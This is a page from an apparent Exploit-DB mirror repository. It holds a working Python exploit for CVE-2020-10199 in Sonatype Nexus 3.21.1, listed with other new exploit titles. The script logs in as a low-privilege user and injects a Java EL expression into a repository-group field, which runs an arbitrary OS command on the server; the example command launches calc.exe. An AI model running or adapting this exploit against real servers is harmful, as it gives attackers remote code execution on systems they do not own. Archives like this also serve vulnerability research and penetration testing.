bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/49385.py
Offensive Security e95d9f2c13 DB: 2021-01-07 
23 changes to exploits/shellcodes

dirsearch 0.4.1 - CSV Injection
IObit Uninstaller 10 Pro - Unquoted Service Path
WinAVR Version 20100110 - Insecure Folder Permissions
PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
H2 Database 1.4.199 - JNI Code Execution

Responsive ELearning System 1.0 - 'id' Sql Injection
Responsive E-Learning System 1.0 - 'id' Sql Injection
Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)
IPeakCMS 3.5 - Boolean-based blind SQLi
Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting
WordPress Plugin litespeed cache 3.6 - 'server_ip' Cross-Site Scripting
Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE
Responsive E-Learning System 1.0 - Stored Cross Site Scripting
WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting
Newgen Correspondence Management System (corms) eGov 12.0 - IDOR
Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)
Resumes Management and Job Application Website 1.0 - Multiple Stored XSS
Gitea 1.7.5 - Remote Code Execution
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
2021-01-07 05:01:58 +00:00

59 lines
No EOL
1.7 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3
import sys
import base64
import requests
URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'
s = requests.Session()
print('Logging in')
body = {
'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
print('Login unsuccessful')
print(r.status_code)
sys.exit(1)
print('Logged in successfully')
body = {
'name': 'internal',
'online': True,
'storage': {
'blobStoreName': 'default',
'strictContentTypeValidation': True
},
'group': {
'memberNames': [
'$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
]
},
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
print('Command executed')
sys.exit(0)
else:
print('Error executing command, the following was returned by Nexus')
print(r.text)
Reference in a new issue View git blame Copy permalink